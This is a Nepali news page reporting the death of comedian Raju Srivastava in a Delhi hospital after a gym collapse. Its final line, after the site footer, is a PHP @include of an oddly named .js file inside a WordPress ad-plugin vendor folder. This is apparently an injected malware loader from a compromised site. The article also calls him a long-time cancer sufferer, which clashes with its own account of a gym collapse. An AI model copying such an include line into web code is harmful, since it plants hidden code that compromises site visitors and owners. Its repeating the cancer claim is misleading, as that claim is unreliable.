बलिउड कमेडियन राजु श्रीवास्तव रहेनन्

२०७९, ५ आश्विन बुधबार

एजेन्सी– लामो समयसम्म क्यान्सरको पीडित रहेका बलिउड कमेडियन राजु श्रीवास्तवको बुधबार निधन भएको छ।

नयाँ दिल्लीस्थित एम्स अस्पतालमा उपचारका क्रममा उनको निधन भएको हो। भारतीय समाचारमाध्यमले परिवारलाई उदृत गर्दै उनको निधनको खबर पुष्टि गरेका छन्।

१० अगस्टमा जिममा कसरत गर्ने क्रममा उनी बेहोस् भएपछि अस्पताल भर्ना गरिएको थियो। स्वास्थ्यमा सुधार नभएपछि उनलाई लाइफ सपोर्ट सिस्टमममा राखिएको थियो।

राजु श्रीबास्तव स्ट्यान्डप कमेडिका लागि प्रख्यात थिए। उनले बलिउडका कतिपय फिल्ममा पनि अभिनय गरेका छन्।

फेसबुक प्रतिक्रिया

सम्बन्धित शीर्षकहरु

website design & develop by thakuricreation Pvt. Ltd.

@include "wp-content/plugins/ad-inserter/includes/google-api-8/vendor/composer/include/7025.js";